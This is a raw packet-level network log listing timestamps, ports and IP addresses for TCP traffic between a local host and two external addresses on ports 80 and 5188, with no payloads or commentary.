Dec 5, 2024 17:32:16.282387018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.282902002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.282965899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.283071995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.283111095 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.283902884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.283961058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.284044027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.284080029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.284982920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.285003901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.285037994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.285058022 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.285820007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.285866022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.285913944 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.286650896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.286706924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.287111044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.287158012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.287599087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.287657976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.288036108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.288084030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.288603067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.288655043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.289033890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.289077044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.289544106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.289557934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.289587975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.290378094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.290426016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.290539980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.290580034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.291307926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.291352987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.291484118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.291523933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.292233944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.292325974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.292373896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.293226004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.293282032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.293484926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.293529034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.294214964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.294266939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.294275045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.294306993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.295070887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.295145988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.295238018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.296057940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.296103001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.296109915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.296138048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.297539949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.297594070 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.297637939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.297672987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.298145056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.298165083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.298207045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.298846006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.298891068 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.298923969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.298959017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.299683094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.299768925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.299926996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.299978018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.300584078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.300641060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.300683975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.300719976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.301589012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.301644087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.301765919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.301801920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.302463055 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.302512884 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.302635908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.302675009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.303416014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.303467989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.303682089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.303733110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.304352999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.304404020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.304512978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.304550886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.305236101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.305285931 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.305298090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.305332899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.306226969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.306276083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.306277990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.306303024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.307400942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.307415962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.307466030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.308096886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.308141947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.308147907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.308182001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.309036016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.309092045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.309406996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.309454918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.309912920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.310240030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.310292959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.310847998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.310909033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.310950994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.310996056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.311779022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.311841011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.312217951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.312269926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.312683105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.312731028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.312865019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.312900066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.313638926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.313689947 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.313720942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.313754082 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.314302921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.314348936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.314584017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.314630985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.315217018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.315272093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.315474987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.315524101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.316159010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.316224098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.316268921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.317050934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.317107916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.353965998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.354007959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.354027033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.354131937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.354338884 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.354425907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.354449987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.354482889 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.354497910 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.355344057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.355382919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.355395079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.355443954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.356409073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.356451035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.356463909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.356503963 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.357244015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.357299089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.357311964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.357359886 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.358233929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.358282089 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.358283043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.358297110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.358345032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.359190941 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.359213114 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.359225035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.359273911 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.360088110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.360152960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.360165119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.360203028 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.361094952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.361162901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.361176968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.361217976 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.362101078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.362112999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.362127066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.362164021 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.362185955 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.363045931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.363096952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.363109112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.363145113 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.363954067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.363992929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.364007950 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.364042044 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.364895105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.364926100 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.364962101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.364974976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.365010023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.365835905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.365931988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.365943909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.365981102 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.365982056 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.366832018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.366851091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.366864920 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.366889000 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.367851019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.367897034 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.367904902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.367918968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.367949963 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.368738890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.368788958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.368802071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.368839025 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.369720936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.369766951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.369782925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.369796038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.369832039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.370655060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.370738029 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.370755911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.370779991 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.371660948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.371715069 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.371767998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.371782064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.371817112 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.372618914 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.372642994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.372657061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.372684956 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.373610973 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.373661041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.373672962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.373714924 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.374563932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.374813080 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.374864101 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.374869108 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.374881983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.374927044 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.375776052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.375828981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.375842094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.375874043 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.376727104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.376765013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.376781940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.376812935 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.376831055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.377701998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.377742052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.377754927 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.377784014 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.378670931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.378716946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.378730059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.378742933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.378772020 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.379681110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.379760981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.379772902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.379798889 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.380819082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.380847931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.380860090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.380908012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.380939960 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.381742954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.381768942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.381782055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.381817102 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.382586956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.382643938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.382661104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.382688046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.382708073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.383444071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.383524895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.383538008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.383577108 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.384392977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.384447098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.384458065 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.384496927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.385390043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.385445118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.385457039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.385488987 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.386365891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.386435986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.386447906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.386482000 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.386502981 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.387917042 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.439874887 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.459209919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.459297895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.459373951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.459413052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.459548950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.459628105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.459666967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.460567951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.460637093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.460643053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.460669994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.461359978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.461400032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.461615086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.461680889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.462296963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.462349892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.463104963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.463232994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.463290930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.463489056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.463529110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.464189053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.464235067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.464243889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.464266062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.465112925 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.465157032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.465395927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.465434074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.466029882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.466108084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.466147900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.467092037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.467153072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.467550039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.467601061 CET	49793	80	192.168.2.11	185.215.113.84
